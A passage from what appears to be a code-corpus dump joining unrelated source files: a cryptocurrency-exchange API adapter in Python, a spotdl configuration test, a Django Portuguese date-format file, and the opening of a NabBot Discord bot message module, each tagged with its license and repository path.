margin = (type == 'margin')
result.append({
'id': id,
'symbol': symbol,
'base': base,
'quote': quote,
'baseId': baseId,
'quoteId': quoteId,
'active': active,
'type': type,
'spot': spot,
'margin': margin,
'precision': precision,
'limits': limits,
'info': market,
})
return result
def fetch_markets_v1(self, params={}):
response = self.publicGetMarkets(params)
#
# {
# "data": [
# {
# "volume_precision":4,
# "price_precision":2,
# "market":"btc_usdt",
# "min_amount":2,
# "min_volume":0.0001
# },
# ],
# "date":1564507456,
# "code":0
# }
#
markets = self.safe_value(response, 'data', [])
result = []
for i in range(0, len(markets)):
market = markets[i]
id = self.safe_string(market, 'market')
baseId, quoteId = id.split('_')
base = self.safe_currency_code(baseId)
quote = self.safe_currency_code(quoteId)
symbol = base + '/' + quote
precision = {
'amount': self.safe_integer(market, 'volume_precision'),
'price': self.safe_integer(market, 'price_precision'),
}
limits = {
'amount': {
'min': self.safe_number(market, 'min_volume'),
'max': None,
},
'price': {
'min': None,
'max': None,
},
'cost': {
'min': self.safe_number(market, 'min_amount'),
'max': None,
},
}
active = None
result.append({
'id': id,
'symbol': symbol,
'base': base,
'quote': quote,
'baseId': baseId,
'quoteId': quoteId,
'active': active,
'precision': precision,
'limits': limits,
'info': market,
})
return result
def fetch_balance(self, params={}):
defaultType = self.safe_string(self.options, 'defaultType', 'spot')
type = self.safe_string(params, 'type', defaultType)
params = self.omit(params, 'type')
method = 'privateGet' + self.capitalize(type) + 'Assets'
response = getattr(self, method)(params)
#
# {
# "code": 0,
# "list": [
# {
# "currency": "BTC",
# "free": 4723846.89208129,
# "total": 0
# }
# ]
# }
balances = self.safe_value(response, 'list', [])
result = {'info': response}
for i in range(0, len(balances)):
balance = balances[i]
currencyId = self.safe_string(balance, 'currency')
code = self.safe_currency_code(currencyId)
account = self.account()
account['used'] = self.safe_string(balance, 'frozen')
account['free'] = self.safe_string(balance, 'free')
account['total'] = self.safe_string(balance, 'total')
result[code] = account
return self.parse_balance(result, False)
def fetch_order_book(self, symbol, limit=None, params={}):
self.load_markets()
market = self.market(symbol)
request = {
'symbol': market['id'],
}
if limit is not None:
request['limit'] = limit # default 10, max 150
response = self.publicGetOrderBook(self.extend(request, params))
#
# {
# "bids": [
# [9605.77,0.0016],
# [9605.46,0.0003],
# [9602.04,0.0127],
# ],
# "asks": [
# [9627.22,0.025803],
# [9627.12,0.168543],
# [9626.52,0.0011529],
# ],
# "date":1564509499,
# "code":0
# }
#
timestamp = self.safe_timestamp(response, 'date')
return self.parse_order_book(response, symbol, timestamp)
def fetch_tickers(self, symbols=None, params={}):
self.load_markets()
response = self.publicGetTicker(params)
#
# {
# "ticker": [{
# "vol": 40717.4461,
# "change": -1.91,
# "base_vol": 392447999.65374,
# "sell": 9592.23,
# "last": 9592.22,
# "symbol": "btc_usdt",
# "low": 9476.24,
# "buy": 9592.03,
# "high": 9793.87
# }],
# "date": 1589874294,
# "code": 0
# }
#
result = {}
tickers = self.safe_value(response, 'ticker', [])
date = self.safe_integer(response, 'date')
for i in range(0, len(tickers)):
rawTicker = self.extend({
'date': date,
}, tickers[i])
ticker = self.parse_ticker(rawTicker)
symbol = ticker['symbol']
result[symbol] = ticker
return self.filter_by_array(result, 'symbol', symbols)
def fetch_ticker(self, symbol, params={}):
self.load_markets()
market = self.market(symbol)
request = {
'symbol': market['id'],
}
response = self.publicGetTicker(self.extend(request, params))
#
# {
# "ticker": [{
# "vol": 40717.4461,
# "change": -1.91,
# "base_vol": 392447999.65374,
# "sell": 9592.23,
# "last": 9592.22,
# "symbol": "btc_usdt",
# "low": 9476.24,
# "buy": 9592.03,
# "high": 9793.87
# }],
# "date": 1589874294,
# "code": 0
# }
#
date = self.safe_integer(response, 'date')
tickers = self.safe_value(response, 'ticker', [])
firstTicker = self.safe_value(tickers, 0, {})
result = self.extend({'date': date}, firstTicker)
return self.parse_ticker(result, market)
def parse_ticker(self, ticker, market=None):
#
# fetchTicker, fetchTickers
#
# {
# "last":0.021957,
# "symbol": "btc_usdt",
# "base_vol":2249.3521732227,
# "change":-0.6,
# "vol":102443.5111,
# "sell":0.021978,
# "low":0.021791,
# "buy":0.021946,
# "high":0.022266,
# "date"1564518452, # injected from fetchTicker/fetchTickers
# }
#
marketId = self.safe_string_upper(ticker, 'symbol')
symbol = self.safe_symbol(marketId, market, '_')
timestamp = self.safe_timestamp(ticker, 'date')
last = self.safe_number(ticker, 'last')
percentage = self.safe_number(ticker, 'change')
return {
'symbol': symbol,
'timestamp': timestamp,
'datetime': self.iso8601(timestamp),
'high': self.safe_number(ticker, 'high'),
'low': self.safe_number(ticker, 'low'),
'bid': self.safe_number(ticker, 'buy'),
'bidVolume': None,
'ask': self.safe_number(ticker, 'sell'),
'askVolume': None,
'vwap': None,
'open': None,
'close': last,
'last': last,
'previousClose': None,
'change': None,
'percentage': percentage,
'average': None,
'baseVolume': self.safe_number(ticker, 'vol'),
'quoteVolume': self.safe_number(ticker, 'base_vol'),
'info': ticker,
}
def parse_trade(self, trade, market=None):
#
# fetchTrades(public)
#
# {
# "date":1564520003,
# "id":1596149203,
# "amount":0.7073,
# "type":"buy",
# "price":0.02193,
# }
#
# fetchMyTrades(private)
#
# {
# "symbol": "BTC_USDT",
# "order_id": "6707cbdcda0edfaa7f4ab509e4cbf966",
# "id": 28457,
# "price": 0.1,
# "amount": 0,
# "fee": 0.096,
# "fee_currency": "USDT",
# "timestamp": 1499865549,
# "side": "buy",
# "is_maker": True
# }
#
id = self.safe_string(trade, 'id')
orderId = self.safe_string(trade, 'order_id')
timestamp = self.safe_timestamp_2(trade, 'date', 'timestamp')
side = self.safe_string_2(trade, 'type', 'side')
priceString = self.safe_string(trade, 'price')
amountString = self.safe_string(trade, 'amount')
price = self.parse_number(priceString)
amount = self.parse_number(amountString)
cost = self.parse_number(Precise.string_mul(priceString, amountString))
marketId = self.safe_string(trade, 'symbol')
symbol = self.safe_symbol(marketId, market, '_')
takerOrMaker = self.safe_value(trade, 'is_maker')
feeCost = self.safe_number(trade, 'fee')
fee = None
if feeCost is not None:
feeCurrencyId = self.safe_string(trade, 'fee_currency')
feeCurrencyCode = self.safe_currency_code(feeCurrencyId)
fee = {
'cost': feeCost,
'currency': feeCurrencyCode,
}
return {
'id': id,
'info': trade,
'timestamp': timestamp,
'datetime': self.iso8601(timestamp),
'symbol': symbol,
'type': None,
'order': orderId,
'side': side,
'price': price,
'amount': amount,
'cost': cost,
'takerOrMaker': takerOrMaker,
'fee': fee,
}
def fetch_time(self, params={}):
response = self.publicGetTime(params)
#
# {
# "server_time": 1589873762,
# "code": 0
# }
#
return self.safe_timestamp(response, 'server_time')
def fetch_status(self, params={}):
self.publicGetPing(params)
#
# {
# "msg": "pong",
# "code": 0
# }
#
self.status = self.extend(self.status, {
'status': 'ok',
'updated': self.milliseconds(),
})
return self.status
def fetch_trades(self, symbol, since=None, limit=None, params={}):
self.load_markets()
market = self.market(symbol)
request = {
'symbol': market['id'],
}
if limit is not None:
request['limit'] = limit # default 100, max 500
response = self.publicGetTrades(self.extend(request, params))
#
# {
# "data":[
# {
# "date":1564520003,
# "id":1596149203,
# "amount":0.7073,
# "type":"buy",
# "price":0.02193,
# },
# {
# "date":1564520002,
# "id":1596149165,
# "amount":0.3232,
# "type":"sell",
# "price":0.021927,
# },
# ],
# "code": 0,
# "date": 1564520003,
# }
#
data = self.safe_value(response, 'data', [])
return self.parse_trades(data, market, since, limit)
def parse_ohlcv(self, ohlcv, market=None):
#
# [
# 1556712900,
# 2205.899,
# 0.029967,
# 0.02997,
# 0.029871,
# 0.029927
# ]
#
return [
self.safe_timestamp(ohlcv, 0),
self.safe_number(ohlcv, 5), # open
self.safe_number(ohlcv, 3), # high
self.safe_number(ohlcv, 4), # low
self.safe_number(ohlcv, 2), # close
self.safe_number(ohlcv, 1), # volume
]
def fetch_ohlcv(self, symbol, timeframe='1m', since=None, limit=None, params={}):
self.load_markets()
market = self.market(symbol)
request = {
'symbol': market['id'],
'period': self.timeframes[timeframe],
# 'start_time': 1564520003, # starting timestamp, 200 candles before end_time by default
# 'end_time': 1564520003, # ending timestamp, current timestamp by default
}
if since is not None:
startTime = int(since / 1000)
request['start_time'] = startTime
if limit is not None:
duration = self.parse_timeframe(timeframe)
request['end_time'] = self.sum(startTime, limit * duration)
elif limit is not None:
endTime = self.seconds()
duration = self.parse_timeframe(timeframe)
request['startTime'] = self.sum(endTime, -limit * duration)
response = self.publicGetKline(self.extend(request, params))
#
# {
# "code":0,
# "data":[
# [1556712900,2205.899,0.029967,0.02997,0.029871,0.029927],
# [1556713800,1912.9174,0.029992,0.030014,0.029955,0.02996],
# [1556714700,1556.4795,0.029974,0.030019,0.029969,0.02999],
# ]
# }
#
data = self.safe_value(response, 'data', [])
return self.parse_ohlcvs(data, market, timeframe, since, limit)
def create_order(self, symbol, type, side, amount, price=None, params={}):
self.load_markets()
market = self.market(symbol)
defaultType = self.safe_string(self.options, 'defaultType', 'spot')
orderType = self.safe_string(params, 'type', defaultType)
params = self.omit(params, 'type')
request = {
'market': orderType,
'symbol': market['id'],
'amount': self.amount_to_precision(symbol, amount),
# 'post_only': 0, # 0 by default, if set to 1 the order will be canceled if it can be executed immediately, making sure there will be no market taking
}
suffix = ''
if type == 'market':
suffix = '_market'
else:
request['price'] = self.price_to_precision(symbol, price)
request['type'] = side + suffix
response = self.privatePostMarketOrderNew(self.extend(request, params))
#
# {
# "code": 0,
# "order_id": "198361cecdc65f9c8c9bb2fa68faec40"
# }
#
result = self.parse_order(response, market)
return self.extend(result, {
'symbol': symbol,
'side': side,
'type': type,
'amount': amount,
'price': price,
})
def cancel_order(self, id, symbol=None, params={}):
self.load_markets()
defaultType = self.safe_string(self.options, 'defaultType', 'spot')
orderType = self.safe_string(params, 'type', defaultType)
params = self.omit(params, 'type')
request = {
'market': orderType,
'order_id': id,
}
response = self.privatePostMarketOrderCancel(self.extend(request, params))
#
# {
# "code": 0,
# "success": [
# "198361cecdc65f9c8c9bb2fa68faec40",
# "3fb0d98e51c18954f10d439a9cf57de0"
# ],
# "error": [
# "78a7104e3c65cc0c5a212a53e76d0205"
# ]
# }
#
canceledOrders = self.safe_value(response, 'success', [])
numCanceledOrders = len(canceledOrders)
if numCanceledOrders != 1:
raise OrderNotFound(self.id + ' cancelOrder ' + id + ' not found')
return response
def cancel_orders(self, ids, symbol=None, params={}):
self.load_markets()
defaultType = self.safe_string(self.options, 'defaultType', 'spot')
orderType = self.safe_string(params, 'type', defaultType)
params = self.omit(params, 'type')
request = {
'market': orderType,
'order_id': ','.join(ids),
}
response = self.privatePostCancelOrder(self.extend(request, params))
#
# {
# "code": 0,
# "success": [
# "198361cecdc65f9c8c9bb2fa68faec40",
# "3fb0d98e51c18954f10d439a9cf57de0"
# ],
# "error": [
# "78a7104e3c65cc0c5a212a53e76d0205"
# ]
# }
#
canceledOrders = self.safe_value(response, 'success', [])
numCanceledOrders = len(canceledOrders)
if numCanceledOrders < 1:
raise OrderNotFound(self.id + ' cancelOrders error')
return response
def parse_order_status(self, status):
statuses = {
'0': 'open',
'1': 'open', # partially filled
'2': 'closed',
'3': 'canceled',
'4': 'canceled', # partially filled and canceled
}
return self.safe_string(statuses, status, status)
def parse_order(self, order, market=None):
#
# createOrder
#
# {
# "code": 0,
# "order_id": "198361cecdc65f9c8c9bb2fa68faec40"
# }
#
# fetchOrder, fetchOpenOrders, fetchOrders
#
# {
# "symbol": "BTC_USDT",
# "order_id": "dd3164b333a4afa9d5730bb87f6db8b3",
# "created_date": 1562303547,
# "finished_date": 0,
# "price": 0.1,
# "amount": 1,
# "cash_amount": 1,
# "executed_amount": 0,
# "avg_price": 0,
# "status": 1,
# "type": "buy",
# "kind": "margin"
# }
#
id = self.safe_string(order, 'order_id')
timestamp = self.safe_timestamp(order, 'created_date')
lastTradeTimestamp = self.safe_timestamp(order, 'finished_date')
side = self.safe_string(order, 'type')
type = None
if side is not None:
parts = side.split('_')
numParts = len(parts)
if numParts > 1:
side = parts[0]
type = parts[1]
else:
type = 'limit'
status = self.parse_order_status(self.safe_string(order, 'status'))
marketId = self.safe_string(order, 'symbol')
symbol = self.safe_symbol(marketId, market, '_')
amount = self.safe_number(order, 'amount')
filled = self.safe_number(order, 'executed_amount')
price = self.safe_number(order, 'price')
average = self.safe_number(order, 'avg_price')
return self.safe_order({
'info': order,
'id': id,
'clientOrderId': None,
'timestamp': timestamp,
'datetime': self.iso8601(timestamp),
'lastTradeTimestamp': lastTradeTimestamp,
'symbol': symbol,
'type': type,
'timeInForce': None,
'postOnly': None,
'side': side,
'price': price,
'stopPrice': None,
'amount': amount,
'filled': filled,
'remaining': None,
'cost': None,
'average': average,
'status': status,
'fee': None,
'trades': None,
})
def fetch_open_orders(self, symbol=None, since=None, limit=None, params={}):
defaultType = self.safe_string(self.options, 'defaultType', 'spot')
orderType = self.safe_string(params, 'type', defaultType)
params = self.omit(params, 'type')
self.load_markets()
market = None
request = {
'market': orderType,
}
if symbol is not None:
market = self.market(symbol)
request['symbol'] = market['id']
response = self.privateGetMarketOrderCurrent(self.extend(request, params))
#
# {
# "code": 0,
# "data": [
# {
# "symbol": "BTC_USDT",
# "order_id": "dd3164b333a4afa9d5730bb87f6db8b3",
# "created_date": 1562303547,
# "finished_date": 0,
# "price": 0.1,
# "amount": 1,
# "cash_amount": 1,
# "executed_amount": 0,
# "avg_price": 0,
# "status": 1,
# "type": "buy",
# "kind": "margin"
# }
# ]
# }
#
data = self.safe_value(response, 'data', [])
return self.parse_orders(data, market, since, limit)
def fetch_orders(self, symbol=None, since=None, limit=None, params={}):
defaultType = self.safe_string(self.options, 'defaultType', 'spot')
orderType = self.safe_string(params, 'type', defaultType)
params = self.omit(params, 'type')
self.load_markets()
market = None
request = {
'market': orderType,
}
if symbol is not None:
market = self.market(symbol)
request['symbol'] = market['id']
if since is not None:
request['start_time'] = int(since / 1000) # default 3 days from now, max 30 days
if limit is not None:
request['limit'] = limit # default 10, max 100
response = self.privateGetMarketOrderHistory(self.extend(request, params))
#
# {
# "code": 0,
# "data": [
# {
# "symbol": "BTC_USDT",
# "order_id": "dd3164b333a4afa9d5730bb87f6db8b3",
# "created_date": 1562303547,
# "finished_date": 0,
# "price": 0.1,
# "amount": 1,
# "cash_amount": 1,
# "executed_amount": 0,
# "avg_price": 0,
# "status": 1,
# "type": "buy",
# "kind": "margin"
# }
# ]
# }
#
data = self.safe_value(response, 'data', [])
return self.parse_orders(data, market, since, limit)
def fetch_order(self, id, symbol=None, params={}):
defaultType = self.safe_string(self.options, 'defaultType', 'spot')
orderType = self.safe_string(params, 'type', defaultType)
params = self.omit(params, 'type')
self.load_markets()
market = None
if symbol is not None:
market = self.market(symbol)
request = {
'market': orderType,
'order_id': id,
}
response = self.privateGetMarketOrder(self.extend(request, params))
#
# {
# "code": 0,
# "data": [
# {
# "symbol": "BTC_USDT",
# "order_id": "dd3164b333a4afa9d5730bb87f6db8b3",
# "created_date": 1562303547,
# "finished_date": 0,
# "price": 0.1,
# "amount": 1,
# "cash_amount": 1,
# "executed_amount": 0,
# "avg_price": 0,
# "status": 1,
# "type": "buy",
# "kind": "margin"
# }
# ]
# }
#
data = self.safe_value(response, 'data', [])
order = self.safe_value(data, 0)
if order is None:
raise OrderNotFound(self.id + ' fetchOrder() order ' + id + ' not found')
return self.parse_order(order, market)
def fetch_my_trades(self, symbol=None, since=None, limit=None, params={}):
defaultType = self.safe_string(self.options, 'defaultType', 'spot')
orderType = self.safe_string(params, 'type', defaultType)
params = self.omit(params, 'type')
self.load_markets()
market = None
request = {
'market': orderType,
}
if symbol is not None:
market = self.market(symbol)
request['symbol'] = market['id']
if since is not None:
request['start_time'] = int(since / 1000) # default 3 days from now, max 30 days
if limit is not None:
request['limit'] = limit # default 10, max 100
response = self.privateGetMarketMytrades(self.extend(request, params))
#
# {
# "code": 0,
# "list": [
# {
# "symbol": "BTC_USDT",
# "order_id": "6707cbdcda0edfaa7f4ab509e4cbf966",
# "id": 28457,
# "price": 0.1,
# "amount": 0,
# "fee": 0.096,
# "fee_currency": "USDT",
# "timestamp": 1499865549,
# "side": "buy",
# "is_maker": True
# }
# ]
# }
#
data = self.safe_value(response, 'list', [])
return self.parse_trades(data, market, since, limit)
def parse_ledger_entry_type(self, type):
types = {}
return self.safe_string(types, type, type)
def parse_ledger_entry(self, item, currency=None):
#
# {
# "currency_mark": "BTC",
# "type": 100234,
# "num": 28457,
# "balance": 0.1,
# "time": 1546272000
# }
#
id = self.safe_string(item, 'num')
account = None
type = self.parse_ledger_entry_type(self.safe_string(item, 'type'))
code = self.safe_currency_code(self.safe_string(item, 'currency_mark'), currency)
timestamp = self.safe_timestamp(item, 'time')
before = None
after = self.safe_number(item, 'balance')
status = 'ok'
return {
'info': item,
'id': id,
'direction': None,
'account': account,
'referenceId': None,
'referenceAccount': None,
'type': type,
'currency': code,
'amount': None,
'before': before,
'after': after,
'status': status,
'timestamp': timestamp,
'datetime': self.iso8601(timestamp),
'fee': None,
}
def fetch_ledger(self, code=None, since=None, limit=None, params={}):
defaultType = self.safe_string(self.options, 'defaultType', 'spot')
orderType = self.safe_string(params, 'type', defaultType)
params = self.omit(params, 'type')
self.load_markets()
request = {
'market': orderType,
}
currency = None
if code is not None:
currency = self.currency(code)
request['currency_mark'] = currency['id']
if since is not None:
request['start_time'] = int(since / 1000)
if limit is not None:
request['limit'] = limit # default 100, max 1000
response = self.privateGetMarketFinancelog(self.extend(request, params))
#
# {
# "code": 0,
# "data": {
# "total": 521,
# "finance": [
# {
# "currency_mark": "BTC",
# "type": 100234,
# "num": 28457,
# "balance": 0.1,
# "time": 1546272000
# }
# ]
# }
# }
#
data = self.safe_value(response, 'data', {})
items = self.safe_value(data, 'finance', [])
return self.parse_ledger(items, currency, since, limit)
def parse_deposit_address(self, depositAddress, currency=None):
#
# {
# "addressTag":"",
# "address":"0xf1104d9f8624f89775a3e9d480fc0e75a8ef4373",
# "currency":"USDT",
# "chain":"ERC20"
# }
#
address = self.safe_string(depositAddress, 'address')
tag = self.safe_string(depositAddress, 'addressTag')
currencyId = self.safe_string_upper(depositAddress, 'currency')
code = self.safe_currency_code(currencyId)
return {
'info': depositAddress,
'code': code,
'address': address,
'tag': tag,
}
def fetch_deposit_address(self, code, params={}):
self.load_markets()
currency = self.currency(code)
request = {
'currency': currency['id'],
}
response = self.privateGetDepositAddress(self.extend(request, params))
#
# {
# "data":[
# {
# "addressTag":"",
# "address":"0xf1104d9f8624f89775a3e9d480fc0e75a8ef4373",
# "currency":"USDT",
# "chain":"ERC20"
# }
# ],
# "code":200
# }
#
data = self.safe_value(response, 'data', [])
addresses = self.parse_deposit_addresses(data)
address = self.safe_value(addresses, code)
if address is None:
raise InvalidAddress(self.id + ' fetchDepositAddress did not return an address for ' + code + ' - create the deposit address in the user settings on the exchange website first.')
return address
def fetch_transactions_by_type(self, type, code=None, since=None, limit=None, params={}):
self.load_markets()
currency = None
request = {
# 'currency': currency['id'],
# 'from': 'fromId', # When direct is' prev ', from is 1, returning from old to new ascending, when direct is' next ', from is the ID of the most recent record, returned from the old descending order
# 'size': 100, # default 100, max 500
# 'direct': 'prev', # "prev" ascending, "next" descending
}
if code is not None:
currency = self.currency(code)
request['currency'] = currency['id']
if limit is not None:
request['size'] = min(500, limit)
method = 'privateGetDepositHistory' if (type == 'deposit') else 'privateGetWithdrawHistory'
response = getattr(self, method)(self.extend(request, params))
#
# {
# "code": 200,
# "data": [
# {
# "id": 1171,
# "currency": "xrp",
# "hash": "ed03094b84eafbe4bc16e7ef766ee959885ee5bcb265872baaa9c64e1cf86c2b",
# "chain": "",
# "amount": 7.457467,
# "address": "rae93V8d2mdoUQHwBDBdM4NHCMehRJAsbm",
# "memo": "100040",
# "fee": 0,
# "state": "safe",
# "created_date": "2020-04-20 11:23:00",
# "finished_date": "2020-04-20 13:23:00"
# },
# ]
# }
#
data = self.safe_value(response, 'data', [])
return self.parse_transactions(data, currency, since, limit, {'type': type})
def fetch_deposits(self, code=None, since=None, limit=None, params={}):
return self.fetch_transactions_by_type('deposit', code, since, limit, params)
def fetch_withdrawals(self, code=None, since=None, limit=None, params={}):
return self.fetch_transactions_by_type('withdrawal', code, since, limit, params)
def parse_transaction_status(self, status):
statuses = {
'0': 'pending', # Email Sent
'1': 'canceled', # Cancelled(different from 1 = ok in deposits)
'2': 'pending', # Awaiting Approval
'3': 'failed', # Rejected
'4': 'pending', # Processing
'5': 'failed', # Failure
'6': 'ok', # Completed
}
return self.safe_string(statuses, status, status)
def parse_transaction(self, transaction, currency=None):
#
# withdraw
#
# {
# "code": 200,
# "withdraw_id": 700
# }
#
# fetchDeposits, fetchWithdrawals
#
# {
# "id": 1171,
# "currency": "xrp",
# "hash": "ed03094b84eafbe4bc16e7ef766ee959885ee5bcb265872baaa9c64e1cf86c2b",
# "chain": "",
# "amount": 7.457467,
# "address": "rae93V8d2mdoUQHwBDBdM4NHCMehRJAsbm",
# "memo": "100040",
# "fee": 0,
# "state": "safe",
# "created_date": "2020-04-20 11:23:00",
# "finished_date": "2020-04-20 13:23:00"
# }
#
id = self.safe_string_2(transaction, 'id', 'withdraw_id')
address = self.safe_string(transaction, 'address')
tag = self.safe_string(transaction, 'memo') # set but unused
if tag is not None:
if len(tag) < 1:
tag = None
txid = self.safe_string(transaction, 'hash')
currencyId = self.safe_string_upper(transaction, 'currency')
code = self.safe_currency_code(currencyId, currency)
timestamp = self.parse8601(self.safe_string(transaction, 'created_date'))
updated = self.parse8601(self.safe_string(transaction, 'finished_date'))
status = self.parse_transaction_status(self.safe_string(transaction, 'state'))
amount = self.safe_number(transaction, 'amount')
feeCost = self.safe_number(transaction, 'fee')
fee = None
if feeCost is not None:
fee = {'currency': code, 'cost': feeCost}
return {
'info': transaction,
'id': id,
'txid': txid,
'timestamp': timestamp,
'datetime': self.iso8601(timestamp),
'address': address,
'addressTo': address,
'addressFrom': None,
'tag': tag,
'tagTo': tag,
'tagFrom': None,
'type': None,
'amount': amount,
'currency': code,
'status': status,
'updated': updated,
'fee': fee,
}
def withdraw(self, code, amount, address, tag=None, params={}):
self.check_address(address)
self.load_markets()
currency = self.currency(code)
request = {
# 'chain': 'ERC20', 'OMNI', 'TRC20', # required for USDT
'address': address,
'amount': float(amount),
'currency': currency['id'],
}
if tag is not None:
request['memo'] = tag
response = self.privatePostWithdrawNew(self.extend(request, params))
#
# {
# "code": 200,
# "withdraw_id": 700
# }
#
return self.parse_transaction(response, currency)
def sign(self, path, api='public', method='GET', params={}, headers=None, body=None):
version = self.version
url = self.urls['api'] + '/' + version + '/' + self.implode_params(path, params)
query = self.omit(params, self.extract_params(path))
urlencoded = self.urlencode(self.keysort(query))
if api == 'private':
nonce = str(self.nonce())
auth = urlencoded
# the signature is not time-limited :\
signature = self.hmac(self.encode(auth), self.encode(self.secret))
if method == 'GET':
if urlencoded:
url += '?' + urlencoded
elif method == 'POST':
headers = {
'Content-Type': 'application/x-www-form-urlencoded',
}
if urlencoded:
body = urlencoded
headers = {
'ACCESS-KEY': self.apiKey,
'ACCESS-SIGN': signature,
'ACCESS-TIMESTAMP': nonce,
}
else:
if urlencoded:
url += '?' + urlencoded
return {'url': url, 'method': method, 'body': body, 'headers': headers}
def handle_errors(self, statusCode, statusText, url, method, responseHeaders, responseBody, response, requestHeaders, requestBody):
if not response:
return # fall back to default error handler
code = self.safe_string(response, 'code')
if (code == '0') or (code == '200'):
return # no error
feedback = self.id + ' ' + responseBody
if code is None:
raise BadResponse(feedback)
unknownError = [ExchangeError, feedback]
ExceptionClass, message = self.safe_value(self.exceptions['exact'], code, unknownError)
raise ExceptionClass(message)
| mit |
Ritiek/Spotify-Downloader | spotdl/tests/test_config.py | 1 | 2266 | import spotdl.config
import argparse
import os
import sys
import yaml
import pytest
@pytest.mark.xfail
@pytest.fixture(scope="module")
def config_path(tmpdir_factory):
config_path = os.path.join(str(tmpdir_factory.mktemp("config")), "config.yml")
return config_path
@pytest.mark.xfail
@pytest.fixture(scope="module")
def modified_config():
modified_config = dict(spotdl.config.DEFAULT_CONFIGURATION)
return modified_config
def test_dump_n_read_config(config_path):
expect_config = spotdl.config.DEFAULT_CONFIGURATION
spotdl.config.dump_config(
config_path,
config=expect_config,
)
config = spotdl.config.read_config(config_path)
assert config == expect_config
class TestDefaultConfigFile:
@pytest.mark.skipif(not sys.platform == "linux", reason="Linux only")
def test_linux_default_config_file(self):
expect_default_config_file = os.path.expanduser("~/.config/spotdl/config.yml")
assert spotdl.config.DEFAULT_CONFIG_FILE == expect_default_config_file
@pytest.mark.xfail
@pytest.mark.skipif(not sys.platform == "darwin" and not sys.platform == "win32",
reason="Windows only")
def test_windows_default_config_file(self):
raise NotImplementedError
@pytest.mark.xfail
@pytest.mark.skipif(not sys.platform == "darwin",
reason="OS X only")
def test_osx_default_config_file(self):
raise NotImplementedError
class TestConfig:
@pytest.mark.xfail
def test_custom_config_path(self, config_path, modified_config):
parser = argparse.ArgumentParser()
with open(config_path, "w") as config_file:
yaml.dump(modified_config, config_file, default_flow_style=False)
overridden_config = spotdl.config.override_config(
config_path, parser, raw_args=""
)
modified_values = [
str(value)
for value in modified_config["spotify-downloader"].values()
]
overridden_config.folder = os.path.realpath(overridden_config.folder)
overridden_values = [
str(value) for value in overridden_config.__dict__.values()
]
assert sorted(overridden_values) == sorted(modified_values)
| mit |
elkingtonmcb/django | django/conf/locale/pt/formats.py | 504 | 1717 | # -*- encoding: utf-8 -*-
# This file is distributed under the same license as the Django package.
#
from __future__ import unicode_literals
# The *_FORMAT strings use the Django date format syntax,
# see http://docs.djangoproject.com/en/dev/ref/templates/builtins/#date
DATE_FORMAT = r'j \d\e F \d\e Y'
TIME_FORMAT = 'H:i'
DATETIME_FORMAT = r'j \d\e F \d\e Y à\s H:i'
YEAR_MONTH_FORMAT = r'F \d\e Y'
MONTH_DAY_FORMAT = r'j \d\e F'
SHORT_DATE_FORMAT = 'd/m/Y'
SHORT_DATETIME_FORMAT = 'd/m/Y H:i'
FIRST_DAY_OF_WEEK = 0 # Sunday
# The *_INPUT_FORMATS strings use the Python strftime format syntax,
# see http://docs.python.org/library/datetime.html#strftime-strptime-behavior
# Kept ISO formats as they are in first position
DATE_INPUT_FORMATS = [
'%Y-%m-%d', '%d/%m/%Y', '%d/%m/%y', # '2006-10-25', '25/10/2006', '25/10/06'
# '%d de %b de %Y', '%d de %b, %Y', # '25 de Out de 2006', '25 Out, 2006'
# '%d de %B de %Y', '%d de %B, %Y', # '25 de Outubro de 2006', '25 de Outubro, 2006'
]
DATETIME_INPUT_FORMATS = [
'%Y-%m-%d %H:%M:%S', # '2006-10-25 14:30:59'
'%Y-%m-%d %H:%M:%S.%f', # '2006-10-25 14:30:59.000200'
'%Y-%m-%d %H:%M', # '2006-10-25 14:30'
'%Y-%m-%d', # '2006-10-25'
'%d/%m/%Y %H:%M:%S', # '25/10/2006 14:30:59'
'%d/%m/%Y %H:%M:%S.%f', # '25/10/2006 14:30:59.000200'
'%d/%m/%Y %H:%M', # '25/10/2006 14:30'
'%d/%m/%Y', # '25/10/2006'
'%d/%m/%y %H:%M:%S', # '25/10/06 14:30:59'
'%d/%m/%y %H:%M:%S.%f', # '25/10/06 14:30:59.000200'
'%d/%m/%y %H:%M', # '25/10/06 14:30'
'%d/%m/%y', # '25/10/06'
]
DECIMAL_SEPARATOR = ','
THOUSAND_SEPARATOR = '.'
NUMBER_GROUPING = 3
| bsd-3-clause |
Galarzaa90/NabBot | cogs/utils/messages.py | 1 | 24857 | # Copyright 2019 Allan Galarza
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import random
import re
import tibiapy
from cogs.utils.tibia import normalize_vocation
class MessageCondition:
def __init__(self, **kwargs):
self.char: tibiapy.Character = kwargs.get("char")
self.min_level = kwargs.get("min_level")
@property
def vocation(self):
return self.char.vocation.value
@property
def sex(self):
return self.char.sex
@property
def base_voc(self):
return normalize_vocation(self.char.vocation)
class LevelCondition(MessageCondition):
def __init__(self, **kwargs):
super().__init__(**kwargs)
self.level = kwargs.get("level")
class DeathMessageCondition(MessageCondition):
def __init__(self, **kwargs):
super().__init__(**kwargs)
self.death: tibiapy.Death = kwargs.get("death")
self.levels_lost = kwargs.get("levels_lost")
@property
def level(self):
return self.death.level
@property
def killer(self):
if len(self.death.killers) == 1:
return self.death.killer.name
return next((k.name for k in self.death.killers if k.name != self.char.name), self.death.killer.name)
# We save the last messages so they are not repeated so often
last_messages = [""]*50
WAVE_MONSTERS = ["dragon", "dragon lord", "undead dragon", "draken spellweaver", "hellhound", "hellfire fighter",
"frost dragon", "medusa", "serpent spawn", "hydra", "grim reaper"]
ARROW_MONSTERS = ["hunter", "hero", "elf arcanist", "elf scout", "Omruc"]
# Simple level messages
SIMPLE_LEVEL = "**{name}** advanced to level {level}."
SIMPLE_DEATH = "**{name}** ({level}) died to {killer_article}**{killer}**."
SIMPLE_PVP_DEATH = "**{name}** ({level}) was killed by **{killer}**."
# Message list for announce_level
# Parameters: {name}, {level} , {he_she}, {his_her}, {him_her}
# Values in each list element are:
# Relative chance, message, lambda function as filter (takes min_level, level, voc)
# Only relative chance and message are mandatory.
level_messages = [
####
# Not vocation or level specific
####
[30, "**{name}** is level {level}🍰\r\n" +
"I'm making a note here:🎶\r\n" +
"Huge success!🎶\r\n" +
"It's hard to overstate my🎶\r\n" +
"Satisfaction🤖"],
